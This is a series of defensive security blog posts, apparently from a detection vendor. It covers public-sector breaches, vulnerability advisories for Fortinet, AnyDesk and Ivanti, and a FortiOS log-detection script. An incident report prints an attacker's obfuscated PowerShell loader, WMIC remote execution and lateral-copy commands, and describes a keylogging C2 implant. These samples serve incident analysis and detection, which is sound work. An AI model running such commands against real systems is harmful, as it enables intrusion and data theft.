    Luckily, we don’t have to read these cautionary tales from a place of panic. We can look at past situations and use them to learn and grow, starting with these four stories from the past few years. Instead of causing panic, news of cyberattacks in the public sector can serve as lessons learned, spurring teams to evolve their security mindsets and take positive steps to improve their organizations.

    Why state and government entities are targeted

    There are a few reasons why public sectors are particularly susceptible to cyberattacks. For one, many government organizations tend to lean on legacy technology due to limited resources.

    The public sector tends to have staffing gaps as well. The Office of Veteran Affairs reported that there were 40,000 cyber jobs open across the federal, state, and local governments. For state and local government organizations, this shortage might mean they have a small security team or no dedicated security personnel at all.

    To combat cyber threats, public sector organizations need to get strategic with their approach to cybersecurity, leveraging solutions and processes that enable them to work “smarter, not harder.” Let’s cover four examples of state and local government cyberattacks and discuss some practical tips that other public sector organizations can leverage to avoid these situations.

    1. Colorado’s Department of Transportation

    In 2018, Colorado’s Department of Transportation was forced offline by ransomware. According to the Colorado Sun, the attack started when the intruders found a temporary server being used for testing. The team hadn’t implemented any of their standard security controls on this system.

    Then, the attackers moved laterally to reach the main systems in the DOT and started to shut down databases and applications. Although they didn’t pay the ransom, Colorado spent around $1.7 million to clear the over 2,000 affected computers and get systems back online.

    Lesson learned: Public sector organizations must implement proactive measures to stop ransomware attacks early on.

    Your team can start with a low-cost scanning tool that detects signs of an attacker performing reconnaissance on your system or attempting a break-in. These signs often include the presence of network scanners, software removal programs like Process Hacker, active directory access tools, Mimikatz, or Microsoft Process Explorer. Small-scale test attacks are also a red flag.

    Deploying honeypots is also a good idea. They entice attackers to take action, revealing their location in your system and preventing further lateral movement.

    2. Quincy, Illinois

    In early 2022, Quincy, Illinois, faced a significant cyberattack that compromised and encrypted city files. They faced repercussions for months after the initial incident. According to a news article, many of the departments were still not fully functional six months after the incident. For example, the Planning and Development department still couldn’t handle credit card payments when issuing building permits.

    Lesson learned: State and local governments should guard against data breach damage by following standard security guidelines and keeping system backups.

    Public sector organizations can lower the chance of a successful data breach by using resources like cybersecurity frameworks or security playbooks to follow security best practices. These pre-written guidelines minimize guesswork and make it far easier to cover your bases, reducing the overall attack surface.

    Quincy’s cautionary tale also shows the importance of maintaining system backups—especially backing up assets important to business functions and services. To save costs, start with those key assets! No need to back up your entire environment. If a data breach does successfully occur, a system backup makes it far easier to restore business continuity as quickly as possible.

    3. Ft. Lauderdale, Florida

    The city of Fort Lauderdale received an invoice from a known contractor called Moss Construction requesting a payment of $1.2 million. The email seemed legitimate to officials. The Fort Lauderdale mayor said, “[the scam] wasn’t just an email, like, ‘Hey, this is Moss Construction. Send me $1.2 million,’ It was followed up with full documentation, multiple paperwork.”

    The city officials authorized the payment, only to find out later that it was a fraudulent request. Unfortunately, the city never got its money back.

    Lesson learned: It’s critical to deploy periodic, organization-wide training on identifying phishing schemes.

    A few specific education areas to focus on include:

    • Telltale signs of a malicious email, such as an abnormal subject line or repeated focus on a specific subject, such as urgent financial alerts
    • Steps to take to confirm whether or not an email is legitimate

    You can leverage Blumira’s free Phishing 101 guide as a simple way to educate your employees on the basics.

    4. Alaska Department of Health and Social Services

    On May 2, 2021, the Alaskan Department of Health and Social Services (DHSS) saw signs of an intrusion. Three days later, Alaska’s Office of Information Technology (Security Office) notified the DHSS about unauthorized computer access, and they immediately shut down systems to prevent the attackers from further lateral movement.

    But in the three-day window between the first signs of intrusion and the state’s action steps, personally identifiable information (PII) from across the state was available to the intruders, who were later discovered to be sophisticated nation-state level attackers.

    This situation violated the Health Insurance Portability and Accountability Act (HIPAA) and the Alaska Personal Information Protection Act (APIPA). According to an official press release, “Before DHSS implemented the shutdown, the attackers potentially had access to the following types of individuals’ information: full names, dates of birth, Social Security numbers, addresses, telephone numbers, driver’s license numbers, internal identifying numbers (case reports, protected service reports, Medicaid, etc.), health information, financial information, and historical information concerning a person’s interaction with DHSS.”

    Lesson learned: Cyberattacks can happen quickly, so it’s important to establish security automation for containing threats.

    In many cases, such as in this situation, an attack happens so quickly that it’s tricky for humans to find and fix it manually. Security automation helps with rapid containment and multiplies the efforts of a lean and time-pressed team. You can use automation to block malicious source IPs/domains automatically or cut off an affected endpoint’s access to your network.

    By containing threats near-instantaneously, you can prevent significant repercussions from an attack and have the time to investigate the incident safely.

    How Blumira Supports Public Sector IT Teams

    As crazy as these stories are, there’s still good news: your team is in the perfect position to turn these cautionary tales into smart, preventative security measures.

    As you move forward with these recommendations, Blumira is here to help. Our platform was purpose-built for lean IT and security teams, making us an excellent fit for resource-strapped state and government organizations. We provide a centralized platform for simplified security with:

    • Logging and monitoring for early signs of ransomware and other suspicious activity
    • Resources that make it easier for small IT teams to adhere to security best practices, such as security playbooks and 24/7 SecOps support
    • Security automation for containing threats as soon as they appear

    Read more about how we help public sector teams meet NIST requirements.

    Medium
    February 9, 2024

    Fortinet Vulnerabilities in FortiOS sslvpnd and fgfmd Lead to RCE


    What Happened

    On Thursday, Fortinet announced two new, critical vulnerabilities in devices running FortiOS. Successful exploitation of either of these announced vulnerabilities leads to remote code execution.

    If critical vulnerabilities weren’t bad enough, Fortinet has evidence of possible exploitation “in the wild” of CVE-2024-21762. Considering that this vulnerability affects typically public-facing SSL VPN services, malicious scans and exploitation attempts will likely begin en masse.

    Impacted Versions, Available Patches, and Workarounds

    Impacted FortiOS versions for CVE-2024-21762 include 6.0, 6.2, 6.4, 7.0, 7.2 and 7.4. Patches are available for FortiOS versions 6.2 through 7.4. FortiOS version 6.0 has reached EoL and will not be receiving a patch. For those of you still running 6.0, it is recommended to migrate to a fixed release or completely disable the SSL VPN service (as recommended by Fortinet).

    Impacted FortiOS versions for CVE-2024-23113 include 7.0, 7.2, 7.3 with patches available for each version.

    What That Means

    Both of the announced vulnerabilities result in remote code execution. Exploits that result in RCE are among the highest rated security issues and practically give attackers full control over the exploited device. They can create users, make configuration changes, or even pivot to simply deploying a second stage malware attack. In fact, it was just recently reported by The Netherlands National Cyber Security Center (NCSC) that threat actors were abusing an older Fortigate vulnerability (CVE-2022-42475) to deploy a remote access trojan dubbed COATHANGER. While there is no evidence that these new vulnerabilities have been used to deploy this malware, it is certainly possible.

    Organizations running Fortinet devices should begin reviewing patch levels of their devices and start planning to update as soon as possible. As has been noted by Fortinet, CVE-2024-21762 shows evidence of being exploited in the wild. Considering too that checking for and triggering this exploit can be completed with a simple HTTP request, it is likely we’ll see this being widely and frequently abused. Luckily, no publicly available exploits have been uncovered yet, so that creates a *small* barrier to exploitation, but that’s almost like saying a single piece of Scotch tape will keep a cracked dam from busting wide open.

    CVE-2024-23113 is easily outshone by CVE-2024-21762, but should also not be taken lightly. Details are light at this time, but I think 23113 is taking the back seat here for several likely reasons: no active exploitation, an exploit that seems more geared towards internal attacks, and the sheer number of organizations running SSLVPN likely outnumbering those affected by the fgfmd bug. However, the fact that this vulnerability could also result in remote code execution makes it just as important to patch as 21762.

    What Should I Do

    Patches should be applied as soon as possible in this instance. If patching is not an option, then consider one of the approved workarounds as a temporary solution until patching can be completed. If you are running unsupported versions, it’s time to bite the bullet and make the upgrade to a newer version.

    How Would I Know

    Details are light at this time, so it’s difficult to identify active attacks or compromised devices. With details being so light, we can only really recommend the basics:

    • Monitor for suspicious incoming traffic, specifically HTTP requests
    • Monitor changes to FortiOS configurations
    • Monitor for new user creation or unusual activity from existing accounts
    • Monitor for unusual administrative commands
    • Monitor for unusual or suspicious user/administrator logins: unusual location, login without MFA (if enabled), etc.
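    As an added example that is not Blumira's or Fortinet's code, the Python below parses FortiOS event-log lines and applies rules for the items in this list: admin logins from external addresses, repeated failed admin logins (a brute-force threshold the list implies but does not spell out), new administrator accounts, and configuration changes. The log lines, the hostname and the external address 198.51.100.7 are constructed for the example; rule names follow the detections named in this post where one exists.

```python
"""Rules for the FortiGate events this post says to watch, over FortiOS event logs.

Added example, not Blumira's or Fortinet's code. FortiOS writes event logs as
space-separated key=value pairs; the rules key on logdesc, srcip, action and
cfgpath. The sample lines are constructed (198.51.100.7 is a documentation
address standing in for an external source); logids and hostnames are illustrative.
"""
import ipaddress
import re
from collections import Counter
from typing import Dict, List, Optional

_KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
FAILED_LOGIN_THRESHOLD = 3  # failed admin logins from one source before flagging brute force

# Management traffic is expected from these ranges; anything else counts as external.
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                   "127.0.0.0/8", "169.254.0.0/16")]


def parse_fortios_line(line: str) -> Dict[str, str]:
    """Split one FortiOS log line into its key=value fields, quotes stripped."""
    return {k: quoted if quoted else bare for k, quoted, bare in _KV_RE.findall(line)}


def is_external(ip: str) -> bool:
    """True when the source address lies outside the internal ranges above."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # missing or malformed srcip: do not claim it is external
    return not any(addr in net for net in _INTERNAL_NETS)


def classify(ev: Dict[str, str]) -> Optional[str]:
    """Name the detection one parsed event trips, or None for a routine event.
    Names follow the detections listed in this post where one exists."""
    logdesc, src = ev.get("logdesc", ""), ev.get("srcip", "")
    if logdesc == "Admin login successful" and is_external(src):
        return "Fortigate: Successful Admin Login from External IP Address"
    if logdesc == "Admin login failed" and is_external(src):
        return "Fortigate: Failed Admin Login from External IP Address"
    if ev.get("cfgpath") == "system.admin" and ev.get("action") == "Add":
        return "Fortigate: Administrator Account Added"  # example rule name
    if logdesc in ("Object configured", "Object attribute configured"):
        return "Fortigate: Configuration Change"
    return None


def run_detections(lines: List[str]) -> List[str]:
    """Classify every line and add one brute-force finding when an external
    source reaches FAILED_LOGIN_THRESHOLD failed admin logins."""
    findings: List[str] = []
    failures: Counter = Counter()
    for line in lines:
        ev = parse_fortios_line(line)
        name = classify(ev)
        if name is None:
            continue
        findings.append(f"{name} user={ev.get('user', '?')} src={ev.get('srcip', '-')}")
        if name.startswith("Fortigate: Failed"):
            failures[ev["srcip"]] += 1
            if failures[ev["srcip"]] == FAILED_LOGIN_THRESHOLD:
                findings.append(f"Fortigate: Admin Brute Force Attempt src={ev['srcip']}")
    return findings


# Constructed sample: a routine internal login, then an external brute force that
# succeeds, adds a second administrator and edits a firewall policy.
_HDR = 'date=2024-02-09 devname="fw-edge" type="event" subtype="system" '
SAMPLE_LOGS = [
    _HDR + 'time=08:01:12 logid="0100032001" logdesc="Admin login successful" user="admin" '
    'ui="https(10.0.5.20)" srcip=10.0.5.20 action="login" status="success"',
] + [
    _HDR + 'time=09:14:0%d logid="0100032002" logdesc="Admin login failed" user="admin" '
    'ui="https(198.51.100.7)" srcip=198.51.100.7 action="login" status="failed" '
    'reason="passwd_invalid"' % i for i in range(3)
] + [
    _HDR + 'time=09:14:05 logid="0100032001" logdesc="Admin login successful" user="admin" '
    'ui="https(198.51.100.7)" srcip=198.51.100.7 action="login" status="success"',
    _HDR + 'time=09:15:31 logid="0100044546" logdesc="Object configured" user="admin" '
    'ui="https(198.51.100.7)" action="Add" cfgpath="system.admin" cfgobj="support" '
    'msg="Add system.admin support"',
    _HDR + 'time=09:16:02 logid="0100044547" logdesc="Object attribute configured" user="admin" '
    'ui="https(198.51.100.7)" action="Edit" cfgpath="firewall.policy" cfgobj="12" '
    'cfgattr="action[deny->accept]" msg="Edit firewall.policy 12"',
]

if __name__ == "__main__":
    for finding in run_detections(SAMPLE_LOGS):
        print(finding)
```

    Feed real FortiOS syslog lines to run_detections() and adjust _INTERNAL_NETS to the ranges your administrators actually manage from.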

    Blumira can help!

    We have several existing detections as well as global reports that can be used to track everything going on with your Fortinet devices. We will also continue to monitor the situation and deploy additional detections and reports as needed.

    Detections:

    • Fortigate Firmware Available
    • Fortigate: Successful Admin Login from External IP Address
    • Fortigate: SSL-VPN pre-auth RCE CVE-2022-42475
    • Fortigate: Authentication Bypass CVE-2022-40684
    • Fortigate: Failed Admin Login from External IP Address
    • Fortigate: Configuration Change
    • Fortigate SSLVPN Anomalous Access Attempts

    Global Reports:

    • Fortigate: Failed Admin Management Login from External IP
    • Fortigate: Successful Admin Management Login from External IP
    • Fortigate: System Configuration changes
    • Fortigate: VPN – successful logins

    Medium
    February 8, 2024

    AnyDesk Suffers Cyberattack


    AnyDesk Production Systems Compromised

    Running AnyDesk? Time to start patching. As if the minefield that system administrators have to walk on a daily basis isn’t bad enough, AnyDesk confirms that they have had a breach of their production systems. As of the time of writing, no timeline has been officially released. It is suspected that unauthorized access started in early to mid-January 2024 and concluded on January 29th, 2024.

    During that time, threat actors compromised systems and made off with source code and signing certificates used for the AnyDesk client. No official statements have been made about the specific details of the event, including initial access. With Crowdstrike assisting in IR and remediation efforts, these will likely be made public at some point.

    AnyDesk Responds

    AnyDesk has made it clear that ransomware was not the objective of this attack. As of February 4th, systems have been secured and are safe to use. New signing certificates have been issued and applied to both the custom client and general client as of versions 7.0.15 and 8.0.8, respectively. Older versions of the software will continue to run with the compromised certificates. These will likely be revoked by AnyDesk in the future. Antivirus may also soon start blocking or quarantining these versions, so make sure you get updated as soon as possible.

    AnyDesk has confirmed that they have no indication that user endpoints were affected or compromised due to this event. Furthermore, there has been no evidence to indicate that user credentials have been compromised. Out of an abundance of caution, AnyDesk has revoked credentials for users of the customer portal, “my.anydesk.com II”. Customers who use “my.anydesk.com I” are completely uninvolved, because the attack has been pinpointed to specific relay servers in Europe that are only utilized and accessible by “my.anydesk.com II”. Again, AnyDesk stated that no evidence of credential theft has taken place; however, to even be considered possibly vulnerable to credential theft in this incident, you would’ve had to:

    • Authenticate to an affected relay server used by “my.anydesk.com II”
    • That relay server is in Europe
    • The relay server is inside the location zone of the affected servers (Spain and Portugal)
    • You manually entered credentials into the client during the time of the incident (early to mid-January through January 29th).

    It’s not just one of these conditions that has to be true, but ALL have to be true. This is basically AnyDesk saying, “If credentials were compromised, this is how it would have to happen”. This is also an ongoing investigation, so it is likely we will get further confirmation of compromised credentials, if there are any. Either way, we’re all so used to resetting passwords at this point that it may just be easier to do a quick reset and move on to the next fire that requires your attention.

    “Is it safe to run AnyDesk, even after patching?”

    The true consequences of this attack remain to be seen. The details are still coming out and we will likely not have a full disclosure of the event anytime soon. The answer to this question then comes down to your own organizational risk appetite. That is, what level of risk are you willing to accept while waiting for additional information to surface? That answer is wildly different between organizations and no answer is wrong (that is, unless you’re accepting any and all risk, which is a…questionable strategy). Let’s attempt to understand the implications of having source code and signing certificates stolen – what can threat actors do with these? It’s great that AnyDesk has worked to secure their infrastructure and remove the bad guys, but how could these things be used maliciously now that they’re out in the wild?

    Risks associated with stolen source code:

    • Analysis of source code may reveal vulnerabilities or weaknesses that can be exploited in future attacks.
    • Contributes to the research and development of possible 0-day exploits against AnyDesk software.
    • Manipulated and compiled into malicious versions of the software, to be masqueraded as legitimate versions.
    • May lead to additional, targeted attacks against AnyDesk and their customers.

    Risks associated with stolen signing certificates:

    • Threat actors can sign any of their own malicious software with these certificates, making it appear legitimate and pass basic security checks.
    • Threat actors can modify the existing software and re-sign it, so that it appears legitimate in form and function while carrying injected malicious code.

    There are additional checks and balances that hopefully mitigate some of these risks. For example, many antivirus vendors are already marking the stolen certificate as malicious and generating alerts. These risks are also just examples and certainly not guaranteed to happen, nor is this an exhaustive list of all the risks. Stick to the basics of understanding where AnyDesk is used in your environment and properly patching and managing it and you should be safe. On the bright side, you may actually be able to use this event to get some stubborn users off of AnyDesk…not that I have any personal experience with this or anything.


    Incident Highlights

    What Happened?

    • Cyberattack on AnyDesk. Threat Actors gained access to production systems.
    • No specific timeline given yet, but suspected to be early to mid-January 2024 to January 29th, 2024.
    • Incident Response and Remediation began January 29th, 2024 and concluded on February 4th, 2024.
    • Source Code and signing certificates stolen.
    • Not a ransomware attack.
    • No evidence of end user devices being affected or compromised.
    • No evidence of customer credentials being stolen or compromised.
    • No evidence of source code being manipulated in any way.
    • No evidence of on-premise hosted solutions being affected.

    What has AnyDesk done?

    • Partnered with Crowdstrike for IR efforts.
    • Updated the custom client and general client with new certificates.
    • Forced password resets for users of the customer portal, “my.anydesk.com II”.

    Actions to Take

    • If you have a customer portal account with “my.anydesk.com”, complete a login and reset your password if prompted. Enable 2FA if available.
      • If you are not prompted, you are likely not affected, but may want to reset your password anyways.
      • If this password is reused elsewhere, make sure you reset it everywhere.
    • Update to the latest AnyDesk client.
      • For organizations using the custom AnyDesk client, update to version 7.0.15.
      • For organizations using the generally available AnyDesk client, update to version 8.0.8.
    • Scan your environment for the installation and execution of AnyDesk software. Even if you don’t think it’s being used, it is often bundled with third-party software for support and maintenance purposes. It is also not uncommon for users to install this software on their own, unbeknownst to administrators.
      • If you identify installations from bundled software, check to see if the bundled software has any updates.
      • If you identify standalone installations, update as needed or consider removing if they are not approved or no longer needed.
      • If you are concerned about unauthorized access, you can review AnyDesk logs on each endpoint or the web console to identify if any unauthorized access was attempted or permitted in the last 30 days at a minimum.

    Need help finding AnyDesk in your environment? Blumira can help!

    In response to this incident, we have made a new global report available to all of our customers. Titled, “AnyDesk Process per Endpoint”, this report can help you identify if AnyDesk is running in your environment. From there, you can start planning out pushing updates or even just uninstall it if it’s not approved for use in your network. Additionally, if you’d like to be alerted to the use of AnyDesk in your environment, we have a detection titled, “Remote Access Tool: AnyDesk” that will trigger anytime AnyDesk is run on monitored endpoints. This is useful if you want an ongoing scan for AnyDesk use in your environment rather than performing manual audits.


    For further details regarding the event, see AnyDesk’s official communication links below:

    February 2nd Public Statement

    Official Public Statement

    Incident FAQ

    Medium
    February 5, 2024

    Ivanti Connect Secure VPN & Policy Secure Vulnerabilities


    What Happened?

    Researchers have released and reported active exploitation of a collection of four different vulnerabilities (CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, and CVE-2024-21893) in Ivanti Connect Secure VPN and Ivanti Policy Secure appliances. These vulnerabilities allow attackers to remotely run elevated commands on the appliances.


    How Bad is This Vulnerability?

    Documented cases of exploitation and the impact of these attacks on organizations have resulted in CVSS scores ranging between 8.2 and 9.1. Networking devices that are susceptible to this issue include Ivanti Connect Secure (ICS), formerly known as Pulse Connect Secure, and Ivanti Policy Secure gateways. These vulnerabilities impact all supported versions, 9.x and 22.x. Threat actors have developed several custom tools like web shells and credential harvesters to maintain persistence and exfiltrate data from compromised appliances. They have also exhibited awareness of device configurations and logging to carefully cover their tracks. Between the broad vulnerability, active exploitation, and sophisticated tactics, this poses a serious breach risk with potential impacts like network access compromise, data theft, and lateral movement.


    What Should I Do?


    Apply Patches Immediately

    Ivanti has begun releasing patches for affected appliances. Apply these patches to your versions of the impacted products as soon as they become available.

    Implement Mitigations

    If patches are not yet available for your version, apply the mitigations recommended by Ivanti immediately. However, note that some configurations can negatively impact the appliances and the guidance by Ivanti should be followed.

    Reset Passwords

    Immediately reset passwords for any systems or accounts that might have been compromised. This is especially critical for local user accounts on the appliance and any users who authenticated to the appliance during the period of known malware activity.

    Use the Integrity Checker Tool (ICT)

    Run the internal ICT first, followed by the external ICT to check for any tampering or bypass mechanisms installed by attackers. Share the ICT results with Ivanti for further analysis.

    Follow the Hardening Guide

    Mandiant has created a remediation and hardening guide, specific to the released vulnerabilities, that can be followed.


    How Blumira Can Help

    Researchers have identified many post-exploitation attacks that utilize open-source tooling. Reports have listed programs such as Impacket, CrackMapExec, Iodine, and Enum4Linux among the tools used after these vulnerabilities are exploited. The Incident Detection Engineering team is actively working on creating additional detections surrounding known TTPs. Blumira also currently has many different detections for this activity including:

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira is actively working on a detection for QueueJumper for its customers.

    Blumira is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for trial and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.

    Low
    January 29, 2024

    Masked Application Attack Incident Report


    Executive Summary

    On November 20, 2023, Blumira produced three findings that led to a Security Incident investigation regarding remote code being run on two separate XYZ Company hosts. The initial workstation host {hostname1} downloaded a malicious executable that was masked as “Advanced IP Scanner.” This file then began running automated Batch script commands and replicating this behavior on the server {DomainController2}. Under the attacker's control, the malicious application also began setting up a Command & Control session with an IP address hosted at Cloudflare.

    Incident Walkthrough

    Note: All IP addresses, hostnames, and usernames have been changed to protect customer data.

    2023-11-20

    Time: 18:57 UTC

    Mitre Tactic & Technique: Discovery, T1018 – Remote System Discovery

    Activity #1: TOMSMITH mistakenly downloaded malicious software on hostname1. This malicious software masked itself as Advanced IP Scanner in Google search results, and resulted in the user navigating to a fake version of this software hosted in a Cloudflare instance. The logs show the installation of this program onto hostname1 as well. Important artifacts created around this time are:

    C:\ProgramData\Microsoft\NodejsToolsVsix\CG6oDkyFHl3R.t
    C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t


    Time: 18:59 UTC

    Activity #2: A Blumira finding for Advanced IP Scanner was generated. While this wasn’t the legitimate version of Advanced IP Scanner, we do still see the value in detecting an early stage reconnaissance, as correlated activity could be early warning signs of an attack.


    Time: 19:06 UTC

    Mitre Tactic & Technique: Discovery, T1016 – System Network Configuration Discovery

    Activity #3: Administrator runs several commands to gather information about the AD domain.

    "C:\WINDOWS\system32\nslookup.exe" internaldomain.local
    "C:\WINDOWS\system32\systeminfo.exe"

    Time: 19:06 UTC

    Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter

    Activity #4: When Advanced_IP_Scanner_2.5.4594.1.exe is run, we can see the LOLBAS technique in action. The two commands that follow show the DLL being built and then the script being called.

    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline"
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\TOMSMITH\AppData\Local\Temp\RESA392.tmp" "C:\Users\TOMSMITH\AppData\Local\Temp\vbcEF74F3B3EC042EBBFF08FC71F3636EB.TMP"

    Time: 19:07 UTC

    Mitre Tactic & Technique: Collection, T1074.002 – Data Staged: Remote Data Staging

    Activity #5: Administrator runs the command below to copy a malicious batch file to the newly discovered domain controller.

    "C:\WINDOWS\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y

    Time: 19:08 UTC

    Mitre Tactic & Technique: Execution, T1047 – Windows Management Instrumentation

    Activity #6: From hostname1 the attacker uses WMI for remote command execution to run the newly copied code on the domain controller.

    "C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create "cmd.exe /cC:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"


    Time: 19:08 UTC

    Activity #7: A Blumira finding for WMI Remote Code Execution was generated for the previous command.


    Time: 19:09 UTC on DomainController2

    Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter

    Activity #8: Now that the attacker had an available remote shell into the domain controller, they were able to run commands on the DomainController2 host. DomainController2 then runs the following PowerShell script.

    C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe  -windowstyle Hidden -command "Set-Item Variable:LeX 'Net.WebClient';Set-Item Variable:/8i'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t';ls _-*;SI Variable:TL(.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name).Invoke('N*-O*')(GV LeX -Valu));Set-Item Variable:\h ((((Get-Variable TL).Value|GM)|Where-Object{$_.Name-clike'*wn*g'}).Name);$ExecutionContext.(($ExecutionContext|GM)[6].Name)|ForEach-Object{(Get-Variable_).Value.(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'In*'}).Name).Invoke((Get-Variable TL).Value.((Get-ChildItemVariable:/h).Value).Invoke((Variable 8i -ValueOnl)))}"

    To break this down a little:

    1. This part runs PowerShell with a hidden window, which is often a tactic used by malicious scripts to hide their activity from the user:

    C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden 

    2. This creates a new variable named LeX and sets it to Net.WebClient, which is a .NET class used for making web requests.

    Set-Item Variable:LeX 'Net.WebClient' 

    3. This sets another variable, /8i, to a specific file path.

    Set-Item Variable:/8i 'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t' 

    4. This seems to list items in the current directory with names starting with an underscore.

    ls _-* 

    5. The next part of the script uses complex PowerShell syntax to dynamically create and modify variables and their values. This includes accessing the execution context, modifying variable properties, and invoking methods. The script appears to be using reflection and other advanced techniques to dynamically invoke methods and manipulate objects. This is a common tactic in malicious scripts to evade detection and analysis.


    Time: 19:10 UTC

    Mitre Technique: Execution, T1059 – Command and Scripting Interpreter

    Activity #9: We then see a batch script file running from that same directory.

    "C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe" abnormal c:\programdata\Administrator cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat

    Time: 19:10 UTC

    Activity #10: A Blumira finding for Batch Script Execution was generated. We do not alert on all batch script executions, just as we don’t alert on all programs being run. Someone remotely called the command line first from an unusual location to run this batch script.

    We were also given a copy of both the CG6oDkyFHl3R.t and LogConverter.bat from the customer. The .t file was a C# application and here is a breakdown of its key functionalities:

    • Namespace and Classes: The application is contained within the namespace iVyisyGgNYMCvKq.
      • KuSyEkRq Class:
        • This class has three properties: UUID, ID, and Data. These seem to be related to identifying and storing data.
      • TrustAllCertsPolicy Class:
        • Implements the ICertificatePolicy interface and overrides the CheckValidationResult method to always return true. This trusts all SSL certificates.
      • XwOWxCEB Class:
        • Contains various DllImport statements for interacting with user32.dll and kernel32.dll.
        • Defines several static variables and methods for window management, key logging, and sending data to a remote server.
      • arXOPGDNf Class:
        • Defines methods for encrypting and decrypting byte arrays.
    • Methods
      • Main Method:
        • Calls ShowWindow to hide the console window.
        • Invokes the mDrSGqJS method with specific parameters.
      • mDrSGqJS Method:
        • Configures SSL certificate validation callback to trust all certificates.
        • Sets up parameters such as server URL, a unique identifier (cuzGRbghiiDuB), and a byte array (cRcQUEGZXJWrUs).
        • Initiates a loop to communicate with the remote server, handling various commands like “delay,” “exit,” and user input.
      • YJUBBebXRoNQCY Method:
        • Retrieves the active window’s title.
      • pmavtYHsUqft Method:
        • Executes PowerShell scripts and captures the output.
      • mTEBtfK Method:
        • Sends data to a remote server using HTTP POST requests.

    An attacker designed this obfuscated program for remote control and data exfiltration. The program hides its console window, communicates with a server over HTTPS, and can execute PowerShell commands on the local machine, sending the encrypted results back to the server.


    Time: 22:16 UTC

    Activity #11: The malicious software masked itself as Advanced IP Scanner on DomainController2 and we updated the previously created finding with new information.


    Time: 22:53 UTC

    Activity #12: Customer contacts our support team.


    Time: 23:37 UTC

    Activity #13: Support team begins investigation.



    2023-11-20

    Time: 01:54 UTC

    Activity #14: The customer manually isolates the hosts using Blumira Agent.


    Time: 14:13 UTC

    Activity #15: After consulting with the customer and confirming this was an attack and not something expected, a member of the Blumira team starts the process of submitting a report for the malicious Cloudflare instance via Cloudflare’s abuse page.


    Time: 15:27 UTC

    Activity #16: Two files were found on hostname3 as part of an automated backup process for the Administrator profile. SentinelOne took action and blocked the file LogConverter.bat from executing.

    Detection & Defense Recommendations

    In this specific instance there are several different defensive recommendations from the Blumira team.

    1. Most users should not have local administrator permissions. If you, your team, or other everyday endpoint users are running email clients, browsers, and other applications as a local or domain administrator you are opening the door to many automated attacks. Privilege escalation from your account to another device or process becomes exceedingly easier.
    2. Local administrator passwords should be complex and different per workstation. If an attacker is able to discover a single local admin password, that shouldn’t mean they are able to plug that into a script or pass the hash and have it work on every endpoint in an environment. You can use solutions like Windows LAPS to generate unique passwords locally. Windows now natively integrates LAPS, eliminating the need for external installations and also working in conjunction with Entra ID.
    3. As always I’m a huge proponent of testing your SIEM and endpoint detections whenever possible. You can perform a large amount of non-invasive tests. We’re constantly testing these detections in our labs as we create them and over time, however it’s important to ensure everything is working properly by doing testing of your own when possible. There are great tools that are freely available that assist in this testing such as Atomic Red Team, as well as some short tests you can run listed here
    4. Do you know what PowerShell scripts, WMI calls, batch files, and the like are being executed in your environment? Controlling the directories they run from and the accounts that execute them can be very beneficial in determining anomalies.

    How Blumira is Doing Better

    There is no unhackable company, software, hardware, or person. I recently had a discussion the other day on the 7-min security podcast about the expectation to be bulletproof, and how that is damaging everyone on both sides of business. You as a person reading this should not expect yourself to know everything and catch everything; it’s just not possible. What is possible is the ability for us to grow and learn over time and accept that this is something we should constantly be doing. So what could we have done better in this situation?

    1. We were in the process of creating a detection based on the LOLBAS seen at 19:06 with cvtres.exe. We fast track detections like this when seen in an incident, but we should definitely already be detecting them.
    2. Using xcopy in this manner was already on our radar, but we hadn’t prioritized it as a detection. Now that we have seen it in a confirmed attack, we have prioritized it for testing in our lab, against previous customer data to determine if we’ve had misses before, and hopefully will release it to production soon along with the detection mentioned above.

    Summary

    These detections were possible with the installation of either our Blumira Agent or sysmon, however the admin was able to quickly identify and quarantine these hosts with the Blumira Agent. Thanks to the quick actions from both teams, there was no downtime or further remediation needed.

    As this incident demonstrates, early detection and proactive security measures are crucial in preventing threat actors from establishing footholds in your environment. If you're looking for others way to improve your security posture, consider the free Blumira Domain Security Assessment. This new tool provides a comprehensive view of your publicly accessible assets and potential security gaps in minutes - no strings attached. Request your free assessment here.

    Low
    December 8, 2023

    This Vuln: DeleFriend

    In a recent report, threat hunting firm Hunters revealed a concerning design issue in how Google Cloud’s Identity and Access Management (IAM) integrates with Google Workspace’s Domain-Wide Delegation feature.

    In essence, Domain-Wide Delegation could allow a compromised Google Cloud IAM user account to perform discovery actions in GCP, access sensitive data, and carry out actions across an entire Google Workspace domain.

    This Hunters paper proposes two risky scenarios:

